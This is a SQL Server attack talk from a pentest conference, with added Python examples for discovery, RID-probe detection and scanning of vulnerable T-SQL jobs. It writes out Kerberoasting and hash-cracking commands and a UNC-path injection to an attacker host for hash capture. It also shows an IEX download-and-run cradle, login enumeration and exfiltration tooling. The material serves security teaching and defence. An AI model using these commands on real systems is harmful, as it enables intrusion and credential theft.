2020-Troopers20-SQL Server Hacking Tips For Active Directory Environments - Final

SQL Server Hacking Tips for Active Directory Environments
Name: Scott Sutherland

Job: Network & Application Pentester @ NetSPI

Twitter: @_nullbind

Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi

Blogs: https://blog.netspi.com/author/scott-sutherland/

Code: https://github.com/NetSPI/PowerUpSQL
https://github.com/NetSPI/ESC
https://github.com/NetSPI/SQLC2
https://sqlwiki.netspi.com/

Community involvement:
• SQL Injection Wiki
• SQL Server Metasploit modules
• PowerShell Empire functions
• DBATools functions
• DAFT: C# port of PowerUpSQL
• Bloodhound SQL Server edge help language
PRESENTATION OVERVIEW

5 Reasons to target SQL Server

4 Common Entry Points

3 Common Privilege Escalation Techniques

2 Examples of Temporary Table Abuse

1 Evil SQL Client (ESC) console application (msbuild inline task execution)
Why Target SQL Server?

WHY TARGET SQL SERVER?

1 SQL Servers exist in almost every enterprise environment we see.

2 SQL Servers can be blindly discovered quickly in Active Directory environments.

3 SQL Servers have trust relationships with the OS and Active Directory.

4 Exploitable default configurations are incredibly common.

5 Exploitable weak configurations are incredibly common.


Quick Introduction: PowerUpSQL
Introduction to PowerUpSQL

INTRODUCTION TO POWERUPSQL

PowerShell tool that can be used to inventory, audit, and exploit weak SQL Server configurations at scale in AD environments.
It also supports a lot of post-exploitation functionality that covers the kill chain, like Active Directory recon.

Kill chain coverage (diagram): Discovery, Initial Access, Defense Evasion, Privilege Escalation, Lateral Movement, Data Targeting, Command Execution, AD Recon
Introduction to PowerUpSQL

INTRODUCTION TO POWERUPSQL

WWW.POWERUPSQL.COM
• Setup instructions
• Cheat sheets
• Code templates
• Function documentation
• Links to:
- Blogs
- Presentations
- Videos
How do I find SQL Servers using Active Directory?
SQL Server Discovery

How do I find SQL Servers in Active Directory environments?

Domain joined SQL Servers register their service accounts in the Service
Principal Name (SPN) property of the user/computer object in Active
Directory.

The SPNs are added to support Kerberos authentication.

Any domain user can query Active Directory for domain computer/user SPNs.

SQL Servers can be identified by executing LDAP queries for SPNs containing "MSSQLSvc".
SQL Server Discovery

Active Directory PowerShell Cmdlet

Get-ADObject -LDAPFilter "(servicePrincipalName=MSSQL*)"


SQL Server Discovery

PowerUpSQL Functions

Get-DomainSpn -DomainController 10.0.0.1 -Username Domain\User -Password Password123!

Get-DomainSpn -SpnService MSSQL   (just SQL SPNs)

Get-SQLInstanceDomain -Verbose
Common Entry Points

COMMON ENTRY POINTS

1 Domain users can log into SQL Server Express instances by default. Yep.

2 Domain users can log into SQL Server instances due to excessive privileges.

3 Default passwords are left on logins created by applications.

4 Weak service account passwords that can be guessed online/offline.


Common Entry Points

EXCESSIVE PRIVILEGES

• Explicit login privileges provided to domain users by sysadmins or default application installations.

• SQL Server Express inherently includes domain users in the public role when installed on a domain system.
Common Entry Points

PowerUpSQL Functions: Finding Excessive Privileges

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose


Common Entry Points

Default Application Logins


Common Entry Points

DEFAULT APPLICATION LOGINS

Lots of commercial applications commonly use SQL Server.

Many of those applications create default logins in SQL Server.

Those logins often have default passwords that don’t get changed.

Many of those applications create application-specific SQL Server instance names.

Those instance names can be quickly identified via LDAP queries for SPNs, then we can use Get-SQLServerLoginDefaultPw to identify defaults.
Common Entry Points

DEFAULT APPLICATION LOGINS: Example (screenshot of discovered instance names)

Generic instance names are too general for default login targeting; a software-specific instance name can be used for targeting default logins.
Common Entry Points

Weak Passwords: SQL Server Service Accounts
Common Entry Points

WEAK SERVICE ACCOUNT PASSWORDS

Online password guessing – mind the lockout policy!

Kerberoasting

Big thanks to: Tim Medin, Benjamin Delpy, Will Schroeder


Common Entry Points

WHAT IS KERBEROASTING?

Kerberoasting is the process of requesting a TGS service ticket for a domain service account (a domain account with an SPN), recovering the ticket from memory, and trying to determine the password of the service account offline by attempting to decrypt the ticket.

Kerberos ticket-granting service (TGS) service ticket (diagram):
• Outer layer: encrypted with the NTLM (RC4) password hash of the requesting domain user, so the requesting domain user can decrypt it as intended.
• Inner layer (ticket information): encrypted with the NTLM (RC4) password hash of the service account. This is what is brute forced offline. We'll know we guessed the right password for the domain service account when the ticket information decrypts correctly.
Common Entry Points

KERBEROASTING ATTACK SUMMARY

COLLECTION
Rubeus.exe kerberoast /outfile:C:\Temp\domainhashes.txt
Rubeus.exe kerberoast /user:SQLSVC /outfile:C:\Temp\sqlhash.txt

CRACKING
hashcat -m 13100 -a 0 sqlhash.txt passwordfile.txt

EXECUTE COMMANDS ON SQL SERVER THAT USE SQLSVC

Invoke-SQLOSCmd -Instance server1\instance1 -Username domain\sqlsvc -Password "Secret!" -Command "Whoami"

https://github.com/GhostPack/Rubeus#kerberoast | https://hashcat.net/hashcat/
Common Privilege Escalation Methods

COMMON PRIVILEGE ESCALATION METHODS

1 UNC Path Injection + Hash Capture / SMB Relay

2 User Enumeration + Weak Passwords

3 Linked Server + Excessive Privileges


Common Privilege Escalation Methods

UNC PATH INJECTION + Hash Cracking/Relay
Common Privilege Escalation Methods

UNC PATH INJECTION + PASSWORD HASH COLLECTION


https://github.com/NetSPI/PowerUpSQL/wiki/SQL-Server---UNC-Path-Injection-Cheat-Sheet

By default, the PUBLIC role can leverage 2 stored procs for UNC injection: xp_dirtree and xp_fileexist

UNC path injection can be used to force the SQL Server service account to authenticate to the attacker's system:
xp_dirtree '\\attackerip\file'

Capture or relay the NetNTLM password hash for the SQL Server service account, which often has sysadmin privileges (Inveigh, Responder, etc.)

Sysadmins can execute operating system commands via xp_cmdshell


Common Privilege Escalation Methods

UNC PATH INJECTION + PASSWORD HASH COLLECTION

Below is the high-level process for executing the attack at scale in AD:

1. Locate SQL Servers on the domain via LDAP queries for SQL SPNs
2. Attempt to log into each SQL instance as the current domain user
3. Perform UNC path injection and capture SQL Server service account password hashes
4. Crack password hashes offline
5. Log into SQL Server and execute OS commands

The Get-SQLServiceAccountPwHashes function can come in handy

Thanks Thomas Elling!
Common Privilege Escalation Methods

UNC PATH INJECTION + SMB RELAY TIPS

Make sure your target SQL Server doesn't require SMB signing

Target shared SQL Server service accounts
• Service accounts are often configured as sysadmin
• Service accounts are often configured as a local administrator
• Compromise one account = access to all the SQL Servers that use it
Common Privilege Escalation Methods

LOCATING SHARED SERVICE ACCOUNTS (PowerUpSQL)

Get list of domain-joined SQL Servers

$SQLServers = Get-SQLInstanceDomain -Verbose

Group results to reveal shared accounts

$SQLServers | Group-Object domainaccount | Sort-Object count -Descending

List instances using a shared account

$SQLServers | Where-Object domainaccount -Like "SQLSVC"
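An added example (not from the talk or PowerUpSQL) of the SPN-to-instance step from the discovery slides plus the Group-Object step above: it parses constructed LDAP results for MSSQLSvc SPNs into instance names, groups them by service account to surface shared accounts, and picks out the software-specific instance names the default-login slide refers to. All account names, hosts and SPNs below are made-up sample data.

```python
import re
from collections import defaultdict

# Constructed sample of what an LDAP query for (servicePrincipalName=MSSQL*) returns:
# the samAccountName of each user/computer object plus its SPN list. Not real data.
SAMPLE_LDAP_RESULTS = [
    {"samAccountName": "sqlsvc",                       # domain user account shared by two hosts
     "servicePrincipalName": ["MSSQLSvc/sql01.demo.local:1433",
                              "MSSQLSvc/sql01.demo.local",
                              "MSSQLSvc/sql02.demo.local:1433"]},
    {"samAccountName": "SQL03$",                       # computer account (service runs as the machine)
     "servicePrincipalName": ["MSSQLSvc/sql03.demo.local:SQLEXPRESS",
                              "MSSQLSvc/sql03.demo.local:49812",
                              "HOST/sql03.demo.local"]},
    {"samAccountName": "svc_erp",
     "servicePrincipalName": ["MSSQLSvc/erp01.demo.local:ERPAPP"]},
]

SPN_RE = re.compile(r"^MSSQLSvc/(?P<host>[^:/]+)(?::(?P<suffix>[^:]+))?$", re.IGNORECASE)


def parse_sql_spn(spn):
    """Return (host, instance, port) for an MSSQLSvc SPN, or None for any other SPN class.

    MSSQLSvc/host        -> default instance, port not in the SPN
    MSSQLSvc/host:1433   -> numeric suffix is a port (1433 = default instance)
    MSSQLSvc/host:NAME   -> non-numeric suffix is a named instance
    MSSQLSvc/host:49812  -> dynamic port of some instance whose name is not in the SPN
    """
    m = SPN_RE.match(spn)
    if m is None:
        return None
    host, suffix = m.group("host").lower(), m.group("suffix")
    if suffix is None:
        return host, None, None
    if suffix.isdigit():
        return host, None, int(suffix)
    return host, suffix.upper(), None


def build_inventory(ldap_results):
    """Flatten LDAP objects into {instance: service_account} using the host,
    host,port and host\\instance naming that PowerUpSQL-style output uses."""
    inventory = {}
    for obj in ldap_results:
        for spn in obj["servicePrincipalName"]:
            parsed = parse_sql_spn(spn)
            if parsed is None:
                continue
            host, instance, port = parsed
            if instance:
                key = f"{host}\\{instance}"
            elif port and port != 1433:
                key = f"{host},{port}"
            else:
                key = host                       # default instance (1433 or port unspecified)
            inventory[key] = obj["samAccountName"]
    return inventory


def shared_service_accounts(inventory):
    """The Group-Object step: accounts with the hosts they serve, most-shared first.
    One compromised account here means access to every host in its list."""
    hosts_by_account = defaultdict(set)
    for key, account in inventory.items():
        hosts_by_account[account].add(key.split("\\")[0].split(",")[0])
    return sorted(((acct, sorted(hosts)) for acct, hosts in hosts_by_account.items()),
                  key=lambda item: len(item[1]), reverse=True)


def application_instances(inventory):
    """Named instances other than SQLEXPRESS: the software-specific names worth checking
    for vendor default logins first. Treating SQLEXPRESS as 'too general' is an assumption."""
    return sorted(k for k in inventory if "\\" in k and not k.endswith("\\SQLEXPRESS"))
```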
Common Privilege Escalation Methods

USER ENUMERATION + WEAK PASSWORDS
Common Privilege Escalation Methods

ENUMERATING SQL LOGINS

It's common for developers and vendors to create SQL logins with weak passwords, but sometimes you don't know the login name.

As a least-privilege authenticated user you can blindly enumerate all SQL Server logins by fuzzing the numbers provided to the SUSER_NAME() function. Those logins can then be used to guess passwords.
Example:
SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
SELECT SUSER_NAME(3)

Common Privilege Escalation Methods

ENUMERATING DOMAIN USERS AND GROUPS

Through a similar process you can blindly enumerate domain users using the DEFAULT_DOMAIN(), SUSER_SID(), and SUSER_SNAME() functions.
Get Domain
SELECT DEFAULT_DOMAIN() as mydomain;

Get the SID (which ends in the RID) for a Known Group

SELECT SUSER_SID('DEMO\Domain Admins')

Fuzz the RID to Enumerate Users and Groups

SELECT SUSER_SNAME(0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000)
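An added example (not from the slides or PowerUpSQL) that decodes the varbinary SID SUSER_SID() returns, rebuilds it with a different trailing RID to produce the SUSER_SNAME() probes above, and, for the defensive side, flags a RID sweep in captured query text. The SID constant is the value from the slide (it decodes to RID 500); the sweep threshold of 20 is an assumption.

```python
import re
import struct
from collections import defaultdict

# The varbinary SID shown on the slide as SUSER_SNAME()'s argument (copied from the page). It decodes
# to S-1-5-21-<domain>-500, i.e. the domain's RID 500 account, not the Domain Admins group (RID 512).
SLIDE_SID_HEX = "0105000000000005150000009CC30DD479441EDEB31027D0F4010000"


def decode_sid(hex_sid):
    """Parse SUSER_SID() output: returns (S-1-5-... string, identifier authority, subauthorities)."""
    raw = bytes.fromhex(hex_sid[2:] if hex_sid.lower().startswith("0x") else hex_sid)
    revision, sub_count = raw[0], raw[1]
    if revision != 1 or len(raw) != 8 + 4 * sub_count:
        raise ValueError("not a well-formed SID")
    authority = int.from_bytes(raw[2:8], "big")                 # 6-byte big-endian authority
    subs = list(struct.unpack("<%dI" % sub_count, raw[8:]))     # little-endian 32-bit subauthorities
    text = "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))
    return text, authority, subs


def encode_sid(authority, subs):
    """Inverse of decode_sid: the upper-case hex SQL Server accepts as a 0x... literal."""
    raw = bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)
    return raw.hex().upper()


def sid_with_rid(hex_sid, rid):
    """Keep the domain part of a SID and swap in a different trailing RID."""
    _, authority, subs = decode_sid(hex_sid)
    return encode_sid(authority, subs[:-1] + [rid])


def rid_probe_queries(hex_sid, first_rid, last_rid):
    """The probes from the slide, one SUSER_SNAME() call per RID over a known domain SID."""
    return ["SELECT SUSER_SNAME(0x%s)" % sid_with_rid(hex_sid, rid)
            for rid in range(first_rid, last_rid + 1)]


PROBE_RE = re.compile(r"SUSER_SNAME\s*\(\s*0x([0-9A-Fa-f]+)\s*\)", re.IGNORECASE)


def rid_sweep_indicator(query_texts, threshold=20):
    """Detection heuristic over captured query text (for example from SQL Audit or an
    Extended Events session): count distinct RIDs probed per domain SID. A sweep shows
    many RIDs against one domain; the threshold of 20 is an assumption."""
    rids_by_domain = defaultdict(set)
    for query in query_texts:
        for hex_sid in PROBE_RE.findall(query):
            try:
                _, _, subs = decode_sid(hex_sid)
            except ValueError:
                continue
            rids_by_domain[tuple(subs[:-1])].add(subs[-1])
    return {domain: len(rids) for domain, rids in rids_by_domain.items() if len(rids) >= threshold}
```

A normal application never issues dozens of SUSER_SNAME() calls with sequential RIDs from one login, so the indicator above is a low-noise signal when run over query audit data.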
Common Privilege Escalation Methods

ENUMERATING LOGINS AND PASSWORD GUESSING


Invoke-SQLAuditWeakLoginPw

1. Blindly enumerates all SQL logins with a least-privilege SQL login
2. Attempts the user name as the password
3. Custom user/password lists can be provided

Get-SQLFuzzDomainAccount

1. Blindly enumerates domain users and groups associated with the SQL Server's domain with a least-privilege SQL login
Common Privilege Escalation Methods

LDAP QUERIES via SQL SERVER
Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

The OLE DB ADSI provider in SQL Server can be used to craft LDAP queries. A nice blog was written by Thomas Elling on the subject.

Specifically, queries can be created using ad-hoc queries (OPENROWSET) or linked servers (OPENQUERY) without requiring a custom CLR or extended stored procedure.

PowerUpSQL functions and TSQL templates can be found at:

https://www.powerupsql.com
More thanks to Thomas Elling!
Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

Ad-hoc query example using OPENROWSET (screenshot: query returning domain users)
Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

Linked server example using OPENQUERY (screenshot: query returning domain users)
Common Privilege Escalation Methods

Linked Servers + Excessive Privileges
Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Linked servers are basically persistent database connections for SQL Servers. They are usually preconfigured with alternative credentials.

Why should I care?

• Move between SQL Servers (lateral movement)
• Impersonate link users without providing credentials (privilege escalation)
• Crawl SQL Server link networks (bypass network security controls)
• We see misconfigured linked servers in about 50% of environments
Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Identify linked servers:

SELECT * FROM MASTER..SYSSERVERS

Query linked server:

SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')

PowerUpSQL and the Metasploit modules can also be handy for crawling and command execution through linked servers.
Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Leveraging MS SQL Database links: example of an attack path from the internet (diagram, built up across four slides)

Key: LVA = Low Value Application, HVA = High Value Application

Internet (Captain Evil) -> ports 80 and 443 -> DMZ (LVA, HVA) -> ports 1433 and 1434 -> Intranet (LVA, HVA, DB1, ADS)

1. SQL Injection into an application in the DMZ
2. Execute SQL queries and local commands on database servers via nested linked servers: a least-privilege DB link leads on to a DB link configured with an SA account
Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Link crawls can result in access to:


• 100s of systems
• 1000s of databases
• Active Directory domains
• Isolated & protected networks
• Partner networks via VPN

Lots of great work done by Antti Rantasaari:


https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Common Privilege Escalation Methods

SQL SERVER LINK + EXCESSIVE PRIVILEGES

CASE STUDY: Abusing Temporary Tables
Case Study: Abusing Temporary Tables

ABUSING TEMPORARY TABLES

1 Introduction to common approaches

2 Case Study: Vulnerable Agent Job


Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

Similar to regular tables, but intended for temporary use

Stored in the tempdb default database

Devs often use them for temporary data storage and data processing

They can create race conditions that compromise data confidentiality and integrity

Occasionally result in code execution opportunities


Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

There are primarily three variations of temporary tables in SQL Server:

Temporary Table Type   | Scope           | Scope Description
Table Variable         | Batch           | Only accessible within the query batch it's executed in.
Local Temporary Table  | Current Session | Accessible to all query batches within the same active connection until the connection is terminated or the table is explicitly dropped.
Global Temporary Table | All Sessions    | Accessible (read/write) to all active connections until there are no references to the table or the table is explicitly dropped.
Case Study: Abusing Temporary Tables

HOW DO TEMPORARY TABLES WORK?

Below are some common queries for creating and querying temp tables:

Temporary Table Type   | Create                                                                                          | Query
Table Variable         | DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL); | SELECT * FROM @table_variable
Local Temporary Table  | CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);    | SELECT * FROM #LocalTempTbl
Global Temporary Table | CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);  | SELECT * FROM ##GlobalTempTbl
Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Privileged User: Review Source Code
• Agent Jobs
• Stored Procedures
• DDL Triggers
• DML and Logon Triggers

Unprivileged User: Monitor tempdb
• Global temp table names and columns
• Global temp table content
Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb
• View Names
• Global temp tables don't always exist for long
• Limited to a point in time
Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• View Names
• Looping offers better visibility over time
• Throttle to avoid over-utilizing the CPU ☺
Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• View Content
• Race condition results in a data confidentiality issue
Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• Update Content
• Race condition results in a data integrity issue
• This can lead to code execution under specific conditions
CASE STUDY: VULNERABLE AGENT JOB
Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB - SUMMARY

1 SQL Agent Job exists that executes TSQL job hourly

2 TSQL job dynamically creates PowerShell command

3 TSQL job creates global temp table and stores PowerShell command in it

4 TSQL job selects PowerShell command from global temp table

5 TSQL job executes PowerShell via xp_cmdshell


Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTACK - VIEW NAMES

Query tempdb in Loop

• View Names
• We can see temp tables being generated with random names
Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTACK - VIEW NAMES

Query tempdb in Loop

• View Names
• We run the query again and see different temp table names with the same columns
Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTACK - VIEW CONTENT

Query tempdb in Loop

• View Content
• We see a PowerShell command being stored in the temp table that creates the file:
C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\intendedoutput.txt
Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTACK - UPDATE CONTENT

Query tempdb in Loop

• Update Content
• We modify the PowerShell command being stored in the temp table to write to:
C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt
Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTACK - VERIFY EXECUTION

Verify file write

• Via Explorer
• You could also use xp_fileexist 'C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt'
Case Study: Vulnerable Agent Job

PREVENTION

Don't run code blocks that have been stored in a global temporary table.

Don't store sensitive data or code blocks in a global temporary table.

If you need to access data across multiple sessions, consider using memory-optimized tables.
Based on my lab testing, they can provide similar performance benefits without having to expose data to unprivileged users. For more information check out this article from Microsoft.

BLOG: https://blog.netspi.com/exploiting-sql-server-global-temporary-table-race-conditions
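An added example (not the talk's code) for the "privileged user: review source code" step and the prevention advice above: a small Python scanner over Agent job or stored procedure T-SQL that flags a value read from a global temp table reaching xp_cmdshell, sp_executesql or EXEC, run against a constructed job shaped like the case study's and against its local-temp-table fix. The table name, variable names and file path are made up; the scan is a one-hop text heuristic, not a full T-SQL parser.

```python
import re

# Constructed T-SQL shaped like the case study's Agent job (not the actual job from the talk):
# build a PowerShell command, park it in a GLOBAL temp table, read it back, run it via xp_cmdshell.
VULNERABLE_JOB = r"""
DECLARE @cmd NVARCHAR(4000);
SET @cmd = N'powershell -c "Set-Content -Path ''C:\Temp\intendedoutput.txt'' -Value 1"';
CREATE TABLE ##JobCmd (cmd NVARCHAR(4000));
INSERT INTO ##JobCmd VALUES (@cmd);
-- window: any login with access to tempdb can UPDATE ##JobCmd before the next statement runs
DECLARE @run NVARCHAR(4000);
SELECT @run = cmd FROM ##JobCmd;
EXEC master..xp_cmdshell @run;
DROP TABLE ##JobCmd;
"""

# The same job using a LOCAL temp table, which only the job's own session can see or modify.
FIXED_JOB = r"""
DECLARE @cmd NVARCHAR(4000);
SET @cmd = N'powershell -c "Set-Content -Path ''C:\Temp\intendedoutput.txt'' -Value 1"';
CREATE TABLE #JobCmd (cmd NVARCHAR(4000));
INSERT INTO #JobCmd VALUES (@cmd);
DECLARE @run NVARCHAR(4000);
SELECT @run = cmd FROM #JobCmd;
EXEC master..xp_cmdshell @run;
DROP TABLE #JobCmd;
"""

GLOBAL_TEMP_RE = re.compile(r"(?<!#)##\w+")          # ##name, but not a single-# local table
SINKS = r"(xp_cmdshell|sp_executesql|sp_OAMethod|EXEC(?:UTE)?)"


def strip_comments(tsql):
    """Drop -- and /* */ comments so commented-out code does not produce findings
    (heuristic: a '--' inside a string literal is stripped too)."""
    tsql = re.sub(r"/\*.*?\*/", " ", tsql, flags=re.S)
    return re.sub(r"--[^\n]*", " ", tsql)


def find_global_temp_to_exec(tsql):
    """Return (table, variable, sink) triples where a value SELECTed out of a global temp
    table into a variable is later handed to a code-execution sink. Only this one-hop
    pattern, the one from the case study, is recognised."""
    body = strip_comments(tsql)
    findings = []
    for table in sorted(set(GLOBAL_TEMP_RE.findall(body))):
        read_re = r"SELECT\s+(@\w+)\s*=[^;]*?\bFROM\s+" + re.escape(table) + r"\b"
        for read in re.finditer(read_re, body, re.IGNORECASE):
            var = read.group(1)
            # the sink must come after the read, and take the variable as its argument
            sink = re.search(SINKS + r"\s*\(?\s*" + re.escape(var) + r"\b",
                             body[read.end():], re.IGNORECASE)
            if sink:
                findings.append((table, var, sink.group(1).lower()))
    return findings
```

Running the scanner over every Agent job step and stored procedure body (sysjobsteps.command, sys.sql_modules.definition) turns the manual "review source code" step into a repeatable check.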
Evil SQL Client: Overview

What is the Evil SQL Client?

SQL Server attack console client written in C#

Supports discovery, access, escalation, and data exfil commands

Built for pentest and red team operations

Ships with files to execute via msbuild inline tasks

Ships with files to execute via PowerShell


Evil SQL Client: Download

Where can I get it?

https://github.com/netspi/esc
Evil SQL Client: Execution Options

Execution Options: esc.exe

Download release or compile from source

Execute esc.exe
Evil SQL Client: Execution Options

Execution Options: msbuild.exe

The esc.csproj file contains the esc.exe source code in an inline task
*Technique by Casey Smith

Download esc.csproj

Run via msbuild

*Fun fact: No file path needed if only one .csproj file exists in the directory.
Evil SQL Client: Execution Options

Execution Options: msbuild.exe

esc.xml contains a byte array of esc.exe that is loaded via reflection techniques shared by @BoHops (GhostBuild), @subTee, and @mattifestation

Download esc.xml

Run via msbuild


Evil SQL Client: Execution Options

Execution Options: PowerShell – Loading esc.exe Assembly

Load assembly from file or byte array:

[System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe")
or
[System.Reflection.Assembly]::Load($filebytes)

Shortcut: download PowerShell code that automatically loads Evil SQL Client from a string containing a hardcoded byte array.

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1")
Evil SQL Client: Execution Options

Execution Options: PowerShell – Executing esc.exe Functions

Call desired functions. Below are some examples:

[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()
[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()
[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList
[evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled"
[evilsqlclient.Program+EvilCommands]::CheckAccess()
[evilsqlclient.Program+EvilCommands]::MasterAccessList
[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()
[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()
[evilsqlclient.Program+EvilCommands]::MasterAccessList

PowerShell Execution Note


The interactive console currently doesn’t work through PowerShell, but all other functions do.
Hopefully, I’ll fix the bug, but it’s still very usable. ☺
Evil SQL Client: Commands

ESC Commands
Note: The "show settings" command will show the current configuration at any given time.

Discovery          | Access          | Gather                | Escalate        | Exfil
Discover file      | Check access    | Single instance query | Check loginaspw | Set File
Discover domainspn | Check defaultpw | Multi instance query  | Check uncinject | Set FilePath
Discover broadcast | Show access     | List serverinfo       | Run oscmd       | Set icmp
Show discovered    | Export access   | List databases        |                 | Set icmpip
Export discovered  |                 | List tables           |                 | Set http
                   |                 | List links            |                 | Set httpurl
                   |                 | List logins           |                 |
                   |                 | List rolemembers      |                 |
                   |                 | List privs            |                 |

* All query results are exfiled via all enabled methods.

* The data encryption functions are done, but they don't encrypt exfiltrated data at this time.
Evil SQL Client: Query Options

Query Options: Single Instance

Configure Single Instance Target

Set target MSSQLSRV04\SQLSERVER2014


Set username backdoor_account
Set password backdoor_account
Show settings

Execute query

Select @@version
Go
Evil SQL Client: Query Options

Query Options: Multiple Instances

Run discover functions & set

Discover domainspn
Discover broadcast
Discover file c:\temp\instancelist.csv
Show settings

Enable multi-instance targeting

Set targetall enabled
Show settings

Check initial access

Check access
Show access

Execute query

Select @@version
Go

Run Commands

List databases
Evil SQL Client: General Notes

General Notes

If you mess up a command, just run:

clear

CTRL + C kills the application


Evil SQL Client: Demo

ESC Demo

Take Aways

TAKE AWAYS

SQL Server instances are easy to find in Active Directory environments.

The default trust relationships between SQL Server on domain systems and AD can lead to privilege escalation scenarios.

Attacks can originate from the internet or internal vectors.

The same techniques used in PowerUpSQL can be adapted to any medium.

Be proactive about finding common issues and enabling detections.
